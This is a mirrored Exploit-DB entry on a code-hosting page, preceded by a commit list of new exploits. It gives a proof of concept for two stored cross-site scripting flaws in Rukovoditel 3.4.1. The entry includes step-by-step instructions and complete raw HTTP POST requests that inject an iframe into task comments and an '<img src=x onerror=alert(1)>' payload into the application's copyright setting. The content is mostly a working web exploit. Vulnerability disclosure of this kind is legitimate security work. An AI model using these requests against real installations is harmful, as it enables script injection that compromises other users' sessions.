bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51548.txt
Exploit-DB ef9b4e5962 DB: 2023-07-04 
20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00

152 lines
No EOL
5.1 KiB
Text
Raw Blame History

Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs: Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
========================================
steps:
1. login to account
2. create project (http://localhost/index.php?module=items/items&path=21)
3. add task
4. open task
5. add comment as "<iframe src="https://14.rs"></iframe> "
POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=
===========================
###XSS-2###
===========================
1.go to admin account
2.go to configration => applicaton
3.Copyright Text set as "<img src=x onerror=alert(1)>"
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"
ju271AAoy1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NAME]"
Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"
ffgsdfgsdfg
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"
ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_LOGO"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="APP_FAVICON"; filename=""
Content-Type: application/octet-stream
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FAVICON]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"
<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"
english.php
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_SKIN]"
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"
America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"
10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"
m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"
m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"
2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"
0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"
0
-----------------------------12298384558648010343132232769--
Reference in a new issue View git blame Copy permalink